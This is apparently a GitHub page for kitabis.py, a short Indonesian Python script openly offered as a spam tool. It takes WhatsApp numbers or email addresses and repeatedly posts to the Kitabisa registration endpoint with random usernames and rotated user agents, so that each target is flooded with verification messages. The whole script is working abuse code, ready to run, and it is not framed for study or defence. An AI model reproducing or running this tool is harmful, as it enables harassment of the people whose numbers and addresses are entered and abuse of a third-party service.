-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathkitabis.py
More file actions
73 lines (57 loc) · 2.24 KB
/
kitabis.py
File metadata and controls
73 lines (57 loc) · 2.24 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#-*- coding: utf8 -*-
#ya maap kodingam we berantakan :)>
import requests,random,time,os,sys
req=requests.Session()
r='\033[91m'
c='\033[96m'
w='\033[0m'
__banner__ = ('''
spam kita.bisa gan :V
%s ###############################
# %scode : Maoundis %s#
# %srecode: SalisM3 %s#
# %stype : wa/email %s#
# %steam : xiuz.sec %s#
###############################%s
''' % (c,w,c,w,c,w,c,w,c,w))
class Mate_lampu():
def __init__(self):
self.ua=open('ua.txt').read().splitlines()
os.system('clear')
print(__banner__)
self.sok_aelu()
def sok_aelu(self):
type = str(input('[?] type: '))
if type=='wa':
self.tolol = 'phone_number'
self.goblok=str(input('[?] no wa (pisahkan dgn koma): '))
elif type=='email':
self.tolol = 'email'
self.goblok=str(input('[?] email (pisahkan dgn koma): '))
else:
Mate_lampu()
self.goblok = self.goblok.split(",")
self.saapa=int(input('[?] jumlah: '))
print('[!] delay 4 menit :V')
for angka in range(1,self.saapa+1):
for x in self.goblok:
self.spam_kuy(x,angka)
time.sleep(240)
quit('%s[%s#%s]%s selsai ,,,,' % (r,c,r,w))
def uname(self):
uname = ''
for x in range(12):
uname += random.choice('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890')
return uname
def spam_kuy(self,nomorna,angka):
#for i in range(1,self.saapa+1):
ceko = req.post('https://core.ktbs.io/v2/user/registration/temp',headers={'user-agent':random.choice(self.ua)}, json={'full_name':self.uname(),'user_id':nomorna,'user_id_type':self.tolol})
if ceko.status_code == 200:
print(' %s[%d] pesan: %ssuskes spam ke: %s gan hehe :"c ' % (w,angka,c,nomorna))
else:
print(' %s[%d] pesan: %s%s' % (w,angka,r,ceko.json()['errors'][0]['details']['id']))
# -----main -------
try:
sys.exit(Mate_lampu())
except Exception as _er:
quit('%serror: %s' % (r,_er))